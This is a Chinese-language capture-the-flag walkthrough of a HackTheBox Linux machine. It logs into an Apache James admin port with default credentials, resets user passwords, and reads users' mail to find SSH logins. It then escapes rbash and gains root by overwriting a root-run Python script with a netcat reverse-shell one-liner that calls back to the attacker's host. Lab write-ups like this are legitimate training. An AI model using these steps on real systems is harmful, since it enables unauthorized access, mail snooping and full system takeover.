1、nmap扫描
80看看没啥,dirbuster也没扫出啥有价值的
再看nmap的端口扫描结果,出现了James端口,网上搜搜,很快明白了可能存在的漏洞,这篇文章说了默认登录信息是端口4555的root:root,文章下面还写了一些操作命令
2、james渗透
连接它,并列举出用户信息,最后把每个用户的密码都重置为666
telnet 10.10.10.51 4555
listusers
setpassword mindy 666
然后110端口是他的邮件服务,比如我要以mindy用户登录,再查看他的邮件
telnet 10.10.10.51 110
USER mindy
PASS 666
retr 1
retr 2
在第二封邮件里查到了他的ssh
ok登录,但是却什么都不能执行。这是个-rbash,受到了限制的shell
3、rbash绕过
继续搜怎么绕过。这篇有提到怎么绕过
最后我用这个绕过了
ssh mindy@10.10.10.51 "bash --noprofile"
bash-shell就是没字符提示的,很多时候我都没反应过来,以为出问题没成功登录呢
tty:python -c 'import pty; pty.spawn("/bin/bash")'
4、提权
ok老套路linpeas.sh传进去扫
发现有几个文件我们是有写的权限,而在进程扫描中,又发现其中的/opt/tmp.py 恰好root执行的。
这里的提权思路就很简单明了。我有写的权限,那我就把这个文件重写,改成弹shell的文件呗。反正你也是root执行,最后被root执行就成了root弹shell给我了。这个套路,广泛存在于linux靶机中。我之前写的hackthebox的linux靶机渗透文章有很多都是这个套路。可以参考
有很多方法,进去改&删了他再重建&echo覆盖,都可以
echo "import os;os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.57 4444 >/tmp/f')" > /opt/tmp.py
本机打开监听,收到root,搞定